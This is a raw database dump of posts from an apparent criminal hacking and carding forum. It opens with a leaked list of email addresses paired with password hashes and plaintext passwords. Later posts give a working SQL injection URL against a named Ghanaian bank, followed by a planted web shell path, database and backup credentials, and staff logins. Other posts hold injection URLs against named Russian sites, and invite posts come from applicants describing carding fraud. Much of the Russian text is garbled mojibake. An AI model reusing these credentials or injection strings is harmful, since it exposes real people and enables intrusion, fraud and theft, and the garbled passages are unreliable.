\nkostya.loskovich@gmail.com:7288edd0fc3ffcbe93a0cf06e3568e2852168 \nmirvaleev@yandex.ru:78e5ad9665703046ef65f3b0210ef89bfc319f3d M123654der \nmaster9981@mail.ru:597dd91b72c4ab6cf660d0c0142f78305cc68bbb 199422 \nleopard249@yandex.ru:4dde32bd6bdbb5b82dd5fb163eb0c971615b18e9 QW12as \ngraf@nemkov.tk:bfe54caa6d483cc3887dce9d1b8eb91408f1ea7a 987654321 \nneiio.k@yandex.ru:7544031258ca42464484a28ec3b4e3788e79e053 \ngsy88@bk.ru:671cc3a7e588f22af19e3d2d636c3deee42315cd \nnickonor17@yandex.ru:91828e33e143305fc01ae48732e313d2ff67a8d0 \nVitalik83@yandex.ru:0c0896f55608e58062f721a1a27ef56b5f4b62e2 5967578 \nicewoolf@yandex.ru:dc2b7a1f406c97614148ce7c812672b2ff805f21 Diogen30 \nporsin@mail.ru:d2267e7bab8e10c4aa866f0bc30652bdced374af 409928439 \nSergsmw@mail.ru:52cdbf5e866e07488dca18dc869ee9f4ef24ec39 email2011 \nslavik.ivv@bigmir.net:929b944e6c2ff2fdf1802633af885d9f263cc0db \nsdfd@sdf.com:b1b3773a05c0ed0176787a4f1574ff0075f7521e qwerty \nmurzinaa1987@gmail.com:5cec175b165e3d5e62c9e13ce848ef6feac81bff qwerty123 \nrader-888@rambler.ru:f355857ed37249dab6a2a278d91e536ab445cfc7 10101990 \namney@tele2.ru:475a88317f653318000a77ae6c9af1879614c3ae 137900 \nignisfatuum@mail.ru:96aec92e01b1266dd28473d2ac58adcbab57d025 margaret111 \nstels_tr@rambler.ru:cc61cc2b4b4f6aef4b139dc7f7e39c026de2ec04 250018 \nSven_kolonki@mail.ru:15253fa44f0364ba2eba1d7ea75a255e26444e8a gladiator2011 \nyo116@bk.ru:e64db7716cebe69bacb001d46fbad8a13e7e7a65 \nzergnet@mail.ru:4c769085dedcf565f1cf519470f17d47ba2f1a92 bionic \ndavidai693@mail.ru:22254a2688cba126e7a7e9396bc65d5b40c09bc5 \nmam4626@yandex.ru:de9dfa1fd43fab466db26486bf9add451774f803 2934515 \nbald_lively@mail.ru:fe605d3cac6d5698bd85e76ebfbdee18763519c7 321456 \nosipkov06@gmail.com:ba01432d05325555f57cd829eb4b584596536f0a 281170 \nlangust@list.ru:f77a57080b52b7adc6e498805eec84a86b9f9f2d rk3aoy \njohnhellraiser@yandex.ru:c878da46b65b744b6fc837e79e3e52d81d6eb5d \nkhanzhineduard@yandex.ru:92142e58f07836d69b94254a3daa0d47b968eef \ngstas94@mail.ru:c9c526c43d46af188d22500a8494297431f2c507 6605477 \nb-fed2009@yandex.ru:09ad137ea33237fbb7bb0aed6e77eba0d278f4a2 190446 \n\n[/code]', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(1036, 1033, 0, 'w0rm', 1, 'G-Bot Killer', 1403409249, 'áþñÑÂтòõýýþ ñõ÷ úþüüõýтðрøõò.\r\n[URL=\"https://www.dropbox.com/s/kc7b5irfkvgj5su/GBot.zip\"]download[/URL]', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(1038, 1035, 0, 'w0rm', 1, 'ppt.ru [sql-inj]', 1403409441, 'ÑÂðñôþüõý: consultantplus.ppt.ru\r\nуÑÂ÷òøüыù ÑÂúрøÿт:discription.php3\r\nÿõрõüõýýðÑÂ: content=', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(1039, 1036, 0, 'w0rm', 1, '[SQL+shell] uniBank Ghana', 1403409613, '[url]http://www.unibankghana.com/unibank_news_details.php?id=-55+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6--+m[/url]\r\n\r\nversion: 5.0.77\r\ndatabase: unibank2012\r\nuser: unibankghana@localhost\r\nÃÂôüøýúð: /cms\r\n\r\nshell: _ttp://unibankghana.com/cms/uploaded_content/managers/1344158105_plugins.php\r\npass: 469mix0x0604!\r\n\r\n\r\n$ uname -a\r\nLinux accra1.beganmedia.com 2.6.27.5.dn.p4 #4 SMP Fri Nov 7 17:37:14 EST 2008 i686 i686 i386 GNU/Linux\r\n\r\n$ id\r\nuid=48(apache) gid=48(apache) groups=48(apache),502(beganmedia),503(eastgatehotelghana),504(pimi-gh),506(willibrakassociates),508(teldatang),510(gst),512(westernrod),514(gbm),515(masemtv),518(cynosol),519(rpsengineeringservices),520(mediaedgegsm),521(isoceletravel),523(praescientprojects),524(praescientlearning),525(airwatchmedia),526(airwatchmedia.net),527(olcainternational),529(praescient),530(ausbassc),531(awaybus),533(unigateeducation),534(fotaclub),535(williamsam),539(techexpress),540(masemworld),542(bullseyeghana),543(unibankghana),545(doublecrowngroup),546(infosource-solutions),547(unicreditghana),548(giftcel),549(hissghana)\r\n\r\nwget / curl / lynx / links\r\nÚþô:\r\nHost: localhost\r\nLogin: unibankghana\r\nPassword: Ns~4s9dp)d\r\n\r\nBackup:\r\nHost: [url]www.sci-fiwebtech.com[/url]\r\nLogin: ab2726_uniuser\r\nPassword: useralpha1\r\ndatabase: unibank2012\r\ntable: unibank_users\r\n\r\n\r\nKwei:be3891:kweiqf@gmail.com\r\nKofi:803898e2c70b0aa52bd5b15004ec3fdc:kofimanful@gmail.com\r\nAndre:unibank:andre.boadu@unibankghana.com\r\ndatabase: unibankghana\r\ntable: cms_users\r\n\r\n\r\nadmin :ghana:rkafui@gmail.com\r\ncharles:unibank:charles.wordey@unibankghana.com\r\nvivian :unibank:vivian.benful@unibankghana.com\r\nandre :kofiboadu:andre.boadu@unibankghana.com\r\n+\r\n\r\n[code]\r\n/home/beganmedia\r\nafricangulf.beganmedia.com\r\natrak.beganmedia.com\r\nchase.beganmedia.com\r\nfambl.beganmedia.com\r\nkosmik.beganmedia.com\r\nleap.beganmedia.com\r\nmaya.beganmedia.com\r\nmostar.beganmedia.com\r\nna2012.beganmedia.com\r\npmmc.beganmedia.com\r\nselect.beganmedia.com\r\nselect2.beganmedia.com\r\nsteron.beganmedia.com\r\nvmobile.beganmedia.com\r\n[/code]', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(573, 573, 0, 'Invite', 2, 'New invite', 1401213499, '[b]Name[/b]: reversebass\r\n [b]Age[/b]: 28\r\n [b]ICQ[/b]: reversebass@jabbim.cz\r\n [b]e-mail[/b]: reversebass@mail.ru\r\n [b]Info[/b]: architectures:\r\nWindows/OSX/iOS/Android\r\n\r\ncoding: Assembler\r\nх86, C, Delphi,\r\nPython, PHP\r\n\r\nreversing: x86, x64,\r\nusermode, a little\r\nkernel mode\r\n\r\nsoft: IDA Pro,\r\nOllyDbg, Immunity,\r\nWindbg, 010Editor,\r\nPETools, IDR\r\n\r\nother skills:\r\nmalware reversing,\r\ncoding, soft\r\nprotection or HWID\r\nremoving, av bypass,\r\nprotection bypass\r\n\r\npatches, keygens,\r\nshellcode writing,\r\nexploit analyzis,\r\n\r\nsome DBI frameworks\r\n\r\nsome experience in\r\nmanual mobile\r\nmalware reversing\r\nand code\r\ndeobfuscation for\r\nandroid/ios.', 1, 0, '108.162.253.150', 0, 1, 0, 0, 0),
(574, 574, 0, 'Invite', 2, 'New invite', 1401213750, '[b]Name[/b]: reversebass\r\n [b]Age[/b]: Age28\r\n [b]ICQ[/b]: reversebass@jabbim.cz\r\n [b]e-mail[/b]: reversebass@mail.ru\r\n [b]Info[/b]: architectures:\r\nWindows/OSX/iOS/Android\r\ncoding: Assembler\r\nÑ…86, C, Delphi,\r\nPython, PHP\r\nReversing: x86, x64,\r\nusermode, a little\r\nkernel mode\r\nsoft: IDA Pro,\r\nOllyDbg, Immunity,\r\nWindbg, 010Editor,\r\nPETools, IDR\r\nother skills:\r\nmalware reversing,\r\ncoding, soft\r\nprotection or HWID\r\nremoving, av bypass,\r\nprotection bypass\r\npatches, keygens,\r\nshellcode writing,\r\nexploit analyzis,\r\nsome DBI frameworks\r\nsome experience in\r\nmanual mobile\r\nmalware reversing\r\nand code\r\ndeobfuscation for\r\nandroid/ios\r\n.', 1, 0, '108.162.219.110', 0, 1, 0, 0, 0),
(575, 575, 0, 'Invite', 2, 'New invite', 1401215813, '[b]Name[/b]: ebola\r\n [b]Age[/b]: 20\r\n [b]ICQ[/b]: \r\n [b]e-mail[/b]: dasdsdasa22@yandex.com\r\n [b]Info[/b]: I know advanced exploitation of all:xss,csrf,xxe,lfi,rfi,sqli,ssrf.\r\nas for languages:c++,python,php.\r\nI can show my skills once i\'m accepted.\r\nDump from a db i have =D:\r\nVALUES(\'5596\',\'ReVOLVeR)\',\'3\',\'\',\'register88@mail.ru\',\'1158317735\',\'127.0.\r\n0.1\',\'0\',NULL,\'1\',\'3\',\'1\',\'1\',NULL,NULL,NULL,\'0\',\'en\',NULL,\'0\',\'1\',\'1\',\'1\',\'1\',NULL,\r\nNULL,NULL,\'2\',\'2\',\'1\',NULL,\'1158317764\',\'1158317764\',\'1\',\'-1&-1\',\'0\',\'0\',\'0\',\'0\r\n\',\'0\',\'0&1\',\'\',\'\',\'\',\'ab8f8b57b3e6c345b1e8417e18051014\',\'0\',\'0\',\'0\',\'0\',\'0\',\'0\',\'\r\n0\',\'0\',\'0\',\'1:1:1\',\'0\',\'127.0.0.1\',\'0\',\'0\',\'0\',\'0\',NULL);..', 1, 0, '173.245.51.230', 0, 1, 0, 0, 0),
(1017, 1015, 0, 'w0rm', 1, 'hackers&carders forums', 1403312657, '- carder.su\r\n- carder.pro\r\n- carders.cc\r\n- carderplanet.biz\r\n- forum.xakepok.org\r\n- green-hack.net\r\n- inattack\r\n- kiber-zona.org\r\n- verified.ms\r\n- etc\r\n\r\n[URL=\"https://cloud.mail.ru/public/1f9b0d185bba/%D0%91%D0%B0%D0%B7%D1%8B%20%D0%A4%D0%BE%D1%80%D1%83%D0%BC%D0%BE%D0%B2.rar\"]download[/URL]', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(577, 577, 0, 'Invite', 2, 'New invite', 1401244497, '[b]Name[/b]: AD0\r\n [b]Age[/b]: 20\r\n [b]ICQ[/b]: 958614\r\n [b]e-mail[/b]: AD0@zloy.ws\r\n [b]Info[/b]: .', 1, 0, '173.245.53.250', 0, 1, 0, 0, 0),
(578, 578, 0, 'Invite', 2, 'New invite', 1401244951, '[b]Name[/b]: AD0\r\n [b]Age[/b]: 8\r\n [b]ICQ[/b]: 958614\r\n [b]e-mail[/b]: AD0@zloy.ws\r\n [b]Info[/b]: Hi, my name is AD0.\r\nI search and\r\nresearch IT\r\nsecurity, previously\r\n programmed in\r\ndelphi. By a few\r\nlearn everything\r\nthat catches your\r\neye ^)\r\njb AD0@zloy.im\r\notr/pgp\r\nprofiles from other\r\nbords \r\nhttps://exploit.in/forum/index.php?showuser=31283\r\n\r\nhttps://forum.zloy.bz/member.php?u=107640\r\nhttps://damagelab.org/index.php?showuser=13329\r\nhttps://rdot.org/forum/member.php?u=1597\r\n.', 1, 0, '173.245.53.197', 0, 1, 0, 0, 0),
(567, 567, 0, 'Invite', 2, 'New invite', 1401128941, '[b]Name[/b]: Lior\r\n [b]Age[/b]: 25\r\n [b]ICQ[/b]: \r\n [b]e-mail[/b]: lior.ben-porat@rsa.com\r\n [b]Info[/b]: My name is Lior and I\'m from Israel. I work for RSA as a security \r\nresearcher within the RSA Research group. (You can read more about us \r\nhere: http://www.emc.com/emc-plus/rsa-thought-\r\nleadership/firstwatch/index.htm)\r\n\r\nBasically I\'m responsible for monitoring the cybercrime malware \r\necosystem and researching new and emerging threats.\r\nI really like to focus on botnets and their infrastructure, especially those \r\nthat aim to steal money in all kind of ways. Another different area that \r\nfascinates me is the mobile world, I really like to investigate Android \r\nmalicious mobile apps.\r\nOther than that, I\'ve a wealth of experience in Web-application security \r\n(was working as a penetration tester) and malware research.\r\nThat\'s me in general I think :)\r\n\r\nI still don\'t know anything about your team, but I would love to join and \r\ncontribute whenever I can.\r\n\r\nYou can reach me on my twitter account: @lior_bp\r\nOr my Skype: lior-bp.', 1, 0, '108.162.219.86', 0, 1, 0, 0, 0),
(1018, 1016, 0, 'w0rm', 1, 'sberbank', 1403313958, 'à ðñþтðû Ѡúðú тþ ýð ðуôøтõ ñõ÷þÿðÑÂýþÑÂтø ñðýúþüðтþò ÑÂñõрñðýúð, ýõ üþó ýõ ÷ðñÑÂúðÿøть ÑÂøÑÂтõüу) \r\n\r\n[URL=\"https://cloud.mail.ru/public/1f9b0d185bba/%D0%91%D0%B0%D0%B7%D1%8B%20%D0%A4%D0%BE%D1%80%D1%83%D0%BC%D0%BE%D0%B2.rar\"]download[/URL]', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(570, 570, 0, 'Invite', 2, 'New invite', 1401165970, '[b]Name[/b]: nik\r\n [b]Age[/b]: 24\r\n [b]ICQ[/b]: \r\n [b]e-mail[/b]: nik676@yahoo.com\r\n [b]Info[/b]: .', 1, 0, '108.162.222.94', 0, 1, 0, 0, 0),
(572, 572, 0, 'Invite', 2, 'New invite', 1401198598, '[b]Name[/b]: Negeeb\r\n [b]Age[/b]: old shit\r\n [b]ICQ[/b]: negeeb@jabber.org\r\n [b]e-mail[/b]: he1nekken@yandex.ru\r\n [b]Info[/b]: Õî÷ó ðà çâèòüñÿ â òåìà òèêå, âîçìîæÃî Ãà éòè ïà ðòÃåðîâ\r\n\r\nïðîôèëè:\r\nýêñï showuser=38630\r\nïðèâ8 member.php?u=23268\r\nêîðîâêà member.php?u=1547.', 1, 0, '141.101.92.80', 0, 1, 0, 0, 0),
(1375, 1238, 0, 'Invite', 2, 'New invite', 1407459994, '[b]Name[/b]: Nickname\n [b]Age[/b]: \n [b]ICQ/Jabber[/b]: ICQ/Jabber\n [b]e-mail[/b]: Email\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n .', 1, 0, '', 0, 1, 0, 0, 0),
(993, 991, 0, 'Invite', 2, 'New invite', 1401988660, '[b]Name[/b]: Vasya Pupkin\r\n [b]Age[/b]: 28\r\n [b]ICQ[/b]: 655877200\r\n [b]e-mail[/b]: vpupking650@gmail.com\r\n [b]Info[/b]: I have been in the .', 1, 0, '141.101.104.43', 0, 1, 0, 0, 0),
(994, 992, 0, 'Invite', 2, 'New invite', 1401988883, '[b]Name[/b]: Vasya Pupkin\r\n [b]Age[/b]: 28\r\n [b]ICQ[/b]: 655877200\r\n [b]e-mail[/b]: vpupking650@gmail.com\r\n [b]Info[/b]: I have engaged in fraud since 2009 and am a member of several communities where I have a positive \r\nreputation:\r\n\r\nhttp://vpro.su/member.php?u=422\r\nhttp://cclub.su/showthread.php?t=78288\r\n\r\nMy primary area of focus is on carding. I found out about w0rm through Exploit.in. .', 1, 0, '141.101.104.43', 0, 1, 0, 0, 0),
(995, 993, 0, 'Invite', 2, 'New invite', 1401989064, '[b]Name[/b]: Vasya Pupkin\r\n [b]Age[/b]: 28\r\n [b]ICQ[/b]: 655877200\r\n [b]e-mail[/b]: vpupking650@gmail.com\r\n [b]Info[/b]: I have engaged in fraud since 2009 and am a member of several communities where I have a positive \r\nreputation:\r\n\r\nhttp://vpro.su/member.php?u=422\r\nhttp://cclub.su/showthread.php?t=78288\r\n\r\nMy primary area of focus is on carding. I found out about w0rm through Exploit.in. I keep a low \r\nprofile and most of my activity is conducted on closed channels such as ICQ or Jabber. .', 1, 0, '141.101.104.43', 0, 1, 0, 0, 0),
(996, 994, 0, 'Invite', 2, 'New invite', 1401989102, '[b]Name[/b]: Vasya Pupkin\r\n [b]Age[/b]: 28\r\n [b]ICQ[/b]: 655877200\r\n [b]e-mail[/b]: vpupking650@gmail.com\r\n [b]Info[/b]: I have engaged in fraud since 2009 and am a member of several communities where I have a positive \r\nreputation:\r\n\r\nhttp://vpro.su/member.php?u=422\r\nhttp://cclub.su/showthread.php?t=78288\r\n\r\nMy primary area of focus is on carding, specifically as a dumps buyer. I found out about w0rm through \r\nExploit.in. I keep a low profile and most of my activity is conducted on closed channels such as ICQ or \r\nJabber. .', 1, 0, '141.101.104.43', 0, 1, 0, 0, 0),
(997, 995, 0, 'Invite', 2, 'New invite', 1401989159, '[b]Name[/b]: Vasya Pupkin\r\n [b]Age[/b]: 28\r\n [b]ICQ[/b]: 655877200\r\n [b]e-mail[/b]: vpupking650@gmail.com\r\n [b]Info[/b]: I have engaged in fraud since 2009 and am a member of several communities where I have a positive \r\nreputation:\r\n\r\nhttp://vpro.su/member.php?u=422\r\nhttp://cclub.su/showthread.php?t=78288\r\n\r\nMy primary area of focus is on carding, specifically as a dumps buyer. I found out about w0rm through \r\nExploit.in. I keep a low profile and most of my activity is conducted on closed channels such as ICQ or \r\nJabber.\r\n\r\nJabber: JohnnyCougar@exploit.im .', 1, 0, '141.101.104.43', 0, 1, 0, 0, 0),
(998, 996, 0, 'Invite', 2, 'New invite', 1401989287, '[b]Name[/b]: Vasya Pupkin\r\n [b]Age[/b]: 28\r\n [b]ICQ[/b]: 655877200\r\n [b]e-mail[/b]: vpupking650@gmail.com\r\n [b]Info[/b]: I have engaged in fraud since 2009 and am a member of several communities where I have a positive \r\nreputation:\r\n\r\nhttp://vpro.su/member.php?u=422\r\nhttp://cclub.su/showthread.php?t=78288\r\n\r\nMy primary area of focus is on carding, specifically as a dumps buyer. I found out about w0rm through \r\nExploit.in. I keep a low profile and most of my activity is conducted on closed channels such as ICQ or \r\nJabber. Can answer other questions via ICQ/Jabber.\r\n\r\nJabber: JohnnyCougar@exploit.im .', 1, 0, '141.101.104.43', 0, 1, 0, 0, 0),
(1130, 1083, 1119, 'Bo0om', 7, 'Upd', 1403872500, '[CODE]www.menshealth.com - ~ $2000\r\nwww.employmentcrossing.com < $1000\r\nwww.acaloriecounter.com < $1000[/CODE]', 1, 0, '176.209.55.165', 0, 1, 0, 0, 0),
(1129, 1088, 1126, 'w0rm', 1, '', 1403860738, 'ððð òþý þýþ чтþ)', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0),
(1001, 999, 0, 'Invite', 2, 'New invite', 1402098764, '[b]Name[/b]: Th3Shark\r\n [b]Age[/b]: 38\r\n [b]ICQ[/b]: icq\r\n [b]e-mail[/b]: lorem.ipsum@live.nl\r\n [b]Info[/b]: .', 1, 0, '108.162.212.139', 0, 1, 0, 0, 0),
(1002, 1000, 0, 'Invite', 2, 'New invite', 1402099861, '[b]Name[/b]: BlackOS\r\n [b]Age[/b]: 100\r\n [b]ICQ[/b]: icq\r\n [b]e-mail[/b]: BlackOS@bigmir.net\r\n [b]Info[/b]: Coding, hacking etc.\r\nhttps://exploit.in/forum/index.php?showuser=53896\r\n\r\nSometimes i have\r\ninteresting stuff\r\nthat i might want to\r\nsell and sometimes i\r\nneed good hands with\r\nspecific knowledge..', 1, 0, '141.101.75.20', 0, 1, 0, 0, 0),
(1003, 1001, 0, 'Invite', 2, 'New invite', 1402223046, '[b]Name[/b]: z122334455\n [b]Age[/b]: 34\n [b]ICQ[/b]: \n [b]e-mail[/b]: [email]z122334455@yandex.ru[/email]\n [b]Info[/b]: Jkadf dsfkje dsfdskf ewfdfiosd fsdlkfj oifefj sdlkfjsd fewifjsd fsdklfjsd fieofjs \ndfl;ksjf eifjsdkfsd f;eslifjse f;ksldfj seifsejfsd flksdfj e;fiesfjasd fkjsaf leifj \nasdlfksdj f;aeifjse fksdjf ;sl.', 1, 0, '141.101.104.39', 0, 1, 0, 0, 0),
(1005, 1003, 0, 'Invite', 2, 'New invite', 1402665113, '[b]Name[/b]: yand3xd1sk\r\n [b]Age[/b]: 29\r\n [b]ICQ[/b]: seoboss@xmpp.ru\r\n [b]e-mail[/b]: yand3xd1sk@yandex.com\r\n [b]Info[/b]: audit, hacking, botmaster, droid develop and social exploit\r\nbackhat hacking and deep rootkit dev.\r\n\r\n.', 1, 0, '108.162.222.72', 0, 1, 0, 0, 0),
(1006, 1004, 0, 'Invite', 2, 'New invite', 1402744678, '[b]Name[/b]: Your name tomi\r\n [b]Age[/b]: Age32\r\n [b]ICQ[/b]: \r\n [b]e-mail[/b]: whiteagle@Safe-mail.net\r\n [b]Info[/b]: .', 1, 0, '141.101.105.203', 0, 1, 0, 0, 0),
(1007, 1005, 0, 'Invite', 2, 'New invite', 1402769708, '[b]Name[/b]: weqwewq\r\n [b]Age[/b]: 34\r\n [b]ICQ[/b]: 342454\r\n [b]e-mail[/b]: weqwewq@insorg-mail.info\r\n [b]Info[/b]: .', 1, 0, '173.245.53.185', 0, 1, 0, 0, 0),
(1012, 1010, 0, 'Invite', 2, 'New invite', 1403276397, '[b]Name[/b]: t1\r\n [b]Age[/b]: 28\r\n [b]ICQ[/b]: 455921\r\n [b]e-mail[/b]: xz@ukr.net\r\n [b]Info[/b]: .', 1, 0, '199.27.133.59', 0, 1, 0, 0, 0),
(1013, 1011, 0, 'w0rm', 1, 'etxt.ru [deep blind sql-inj]', 1403310767, '_ttps://pay.etxt.ru/ajax.php?act=view&id=if(1=1,sleep(1),1)&lib=main&mod=users&sid=\r\n\r\nwork in acunetix brouser, lets try to hack ;)', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(1014, 1012, 0, 'w0rm', 1, 'about', 1403311001, '[b][ru][/b]\r\náþòüõÑÂтýðѠþñрðñþтúð рõÑÂурÑÂþò ø тõÑÂÑ‚ уÑÂ÷òøüþÑÂтõù ÿõрõô ÿуñûøúðцøõù ò ÿðртýõрÑÂúую ÿрþóрðüüу.\r\n[b][eng][/b]\r\njoint processing resources and test vulnerabilities before publishing affiliate program.', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(1060, 1054, 0, 'w0rm', 1, 'leakforums.org', 1403418439, '[b]ÑÂðùт[/b]: leakforums.org\r\n[b]ðôôþý[/b]: addons.mozilla.org/ru/firefox/addon/user-agent-switcher\r\n\r\n×ðхþôøü ýð óûðòýую ÑÂтрðýøцу ÑÂðùтð, ÑÂüþтрøü ôþÑÂтуÿýыõ рð÷ôõûы, þñрðщðõü òýøüðýøõ ýð рð÷ôõûы рð÷üõщõýýыõ ò ýøöýõù чðÑÂтø фþруüð.\r\n\r\nÃâ€Ã°Ã»ÃµÃµ чøÑÂтøü cookies ôðýýþóþ ÑÂðùтð ø üõýÑÂõü user agent ýð Googlebot.\r\n\r\nÒøôøü ýþòыõ ÿþÑÂòøòшøõÑÂѠрð÷ôõûы ôûѠPremium ю÷õрþò ø ðôüøýþò.\r\n\r\nçтþ üы üþöõü? ßõрõüõщðтьÑÂѠÿþ рð÷ôõûðü ø ÑÂüþтрõть ýð÷òðýøѠÑÂþ÷ôðýýых тõü.\r\n\r\n[IMG]http://i.minus.com/iHdyLdVllkRZK.PNG[/IMG]\r\n\r\nÒыûþöøû, òþ÷üþöýþ уôðÑÂÑ‚ÑÂѠрð÷òøть ÑÂтþ òþ чтþ-тþ ñþûьшõõ. Ñðóð ýõ õôøýøчýð ø ôþ ÑÂтþóþ üýõ тðú öõ ÿþÿðôðûðÑÂÑŒ ýð ôруóøх фþруüðх хðú тõüðтøúø.', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(1059, 1053, 0, 'w0rm', 1, '[SQLi] lk.domru.ru', 1403417910, '_https://lk.domru.ru/\"\r\n\r\n[code]\r\nCDbException\r\nCDbCommand failed to execute the SQL statement: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'128\")\' at line 3\r\n[/code]', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(983, 981, 0, 'Invite', 2, 'New invite', 1401728263, '[b]Name[/b]: K1nD{e]R\r\n [b]Age[/b]: 23\r\n [b]ICQ[/b]: 10117\r\n [b]e-mail[/b]: zl0y.x3k3p@gmail.com\r\n [b]Info[/b]: Mid skill )) â\r\nîñÃîâÃîì äëÿ à Ãà ëèçà \r\nñà éòîâ è âçëîì ïîä\r\nçà êà ç)\r\njabber:\r\nmegadostup@jabber.fm.', 1, 0, '141.101.80.65', 0, 1, 0, 0, 0),
(986, 984, 0, 'w0rm', 1, 'Þрóðýø÷ðцøþýýыõ ôõûð.', 1401824546, 'тõüð þтúрытð ú þñÑÂуöôõýøÑÂü, ò ÿþÑÂûõôÑÂтòøø ÿрõþñрð÷уõтÑÂѠò рð÷ôõû.\n\n[b]тõþрõтøчõÑÂúðѠчðÑÂть[/b]\n\nýõ ÿõрòыù рð÷ ÷ðÿуÑÂúðю чтþ-тþ ò øýтõрýõтõ, хþчу чтþ-ñы ÿþ üõрõ ôþñðòûõýøѠÑÂюôð учðÑÂтýøúþò òÑÂõ ÿþýøüðûø Ѡчõü ýðü рðñþтðть.\n\n1. òÑÂõ ÑÂтþ уöðÑÂýþ ýõ ÑÂтðñøûьýþ, õôøýÑÂтòõýýыù òõрýыù ÿуть, ÿþÑÂтþÑÂýýþ ÿрøüõрýþ рð÷ ò üõÑÂÑÂцÿõрõÑÂтрðøòðть òÑÂõ / þñýðòÃȄÂть /÷ðÿуÑÂúðть чтþ тþ ýþòþõ.\n\nÑÂтðôøø:\n\n1. ÷ðÿуÑÂú - тþ óôõ üы ÑÂõùчðѠýðхþôøüÑÂѠýðшð ÷ðôðчð ÑÂÿрðòðцøрþòðть рþÑÂÑ‚ ðúтøòýþÑÂтø ø øýтõрõÑÂþò. \n2. рþÑÂÑ‚ - ÑÂтðÿ ðúтøòýþóþ ÿрþôòøöõýøѠø ýðÿþûýõýøѠрõÑÂурÑÂð.\n3. ÑÂтðñøûø÷ðцøѠ- ÿрõôõû ÿрþõúтð ò тþü òøôõ ò úþтþрþü üы õóþ ÷ýðõü.\n4. ÑÂÿðô - уÿðôþú øýтõрõÑÂð ú ÿрþõúту.\n\nчõü ýðü ÿрõôÑÂтþøт ÷ðýøüðтьÑÂÑÂ:\n\n1. òõÑÂтø ø þñýþòÃȄÂть тõúущøõ ÿрþõúты\n2. ÷ðÿуÑÂúðть ýþòыõ ÿрþõúты\n3. ÿõрõÑÂüðтрøòðть ø þтúð÷ыòðтьÑÂѠþт ÷ðòõôþüþ хуõòых рõшõýøù.\n\n[b]ÑÂтрðтõóøÑÂ[/b]\n\nôûѠ÷ðÿуÑÂúð\n\nüðúÑÂøüðûьýþ øÑÂÿþûь÷уõü ýðшø ðúтøòы, ÷ýðúþüых, ûþüðýыõ рõÑÂÑ‹, ÑÂтõýы ýð уûøцðх, ðúúðуýты ÑÂòþø ø чуöøõ, òÑÂõ ÑÂðüþõ ÑÂуüðшõôшõõ ø ýõ þрôøýðрýþõ, ÷ðÿрõтþò ýø úðúøх ýõт, ÷ðôðчð ûøшь ôþýõÑÂтø üðúÑÂøüðûьýþ ôðûõúþ чтþ õÑÂть ÿрþõúт.\n\nýð ÑÂтðÿõ рþÑÂтð\n\nÿþ üõрõ ôþñðòûõýøѠûюôõù ÷ðôðчð üðúÑÂøüðûьýþ ñþûьшõ ÑÂþ÷ôðть þñрð÷ ÑÂûøтðрýþÑÂтø, ûюñыüø ÑÂÿþÑÂþñðüø ÿрþôðòðть ðúúðуýты ðôõúòðтýыü ûюôÑÂü, ÿрøòûõúðть øх ú ÿрþõúту. ò ÑÂтþт üþüõýт òþ÷ýøúðõт ÿõрòыõ труôýþÑÂтø ø ýõôþòþÃȄ΄Âтòð, ýðшð ÷ðôðчð þÿõрðтøòýþ рõðóøрþòðть ýð ýøх ø òòþôøть ø÷üõýõýøÑÂ, ò ûюñþü ÑÂûучðõ чðÑÂть ýðрþôð þтÑÂõõтÑÂѠø þÑÂтðýõтÑÂѠúучúð. ò ÑÂтþт üþüõýт ýðÑÂтуÿðõт ÑÂтðñøûø÷ðцøÑÂ.\n\nýð ÑÂтðÿõ ÑÂтðñøûø÷ðцøø\n\nтþ чтþ ÿõрõöøòðют òÑÂõ рõÑÂурÑÂÑ‹ ñуôь тþ ðчðт, òÑÂрøф ø тô. ÑÂтðñøûø÷ðцøѠтþ ýð чõü þýø þÑÂтðýðòûøòðютÑÂÑÂ, ò øтþóõ ÑÂтþ ÿрøòþôøт ú ÑÂÿðôу ðúтøòýþÑÂтø ûøñþ рðÑÂÿðôу ýð чðÑÂтø, ýðш ÿõрøþô ÑÂтðñøûø÷ðцøø фøúÑÂøрþòðý üõÑÂÑÂцõü ÷ð úþтþрыù ÷ðÿûðтøûø учðÑÂýøúø.\n\nÑÂÿðô\n\nò úþýцõ üõÑÂÑÂцð ýðчýõтÑÂÑ ÑÂÿðô, òрõüѠÿõрõüõý!\nýðшð ÷ðôðчð ú úþýцу üõÑÂÑÂцð ÿþôóþтðòûøòðть ýþòþõ, ýþòыõ фуýúцøø, ýþòыõ ÿþô ÿрþõúты, ýþòыõ üõтþôы ò÷ðøüþôõùÑÂтòøѠø тô. ú úþýцу üõÑÂÑÂцð ÿõрõхþôøü ÑÂтðÿу ÷ðÿуÑÂú ÿþ ýþòþù, Ѡþрøõýтøрþü ýð ôруóøõ óруÿÿы , ýð ôруóþù ÿрþõúт ø тô ÿþôúûючðѠøüõющøõÑÂѠрõÑÂурÑÂÑ‹ ø ôþñðòÃȄÂѠýðúþÿûõýýыõ ò хþôõ рðñþты ò тõчõýøø üõÑÂÑÂцð.', 1, 0, '141.101.70.145', 0, 1, 0, 0, 0),
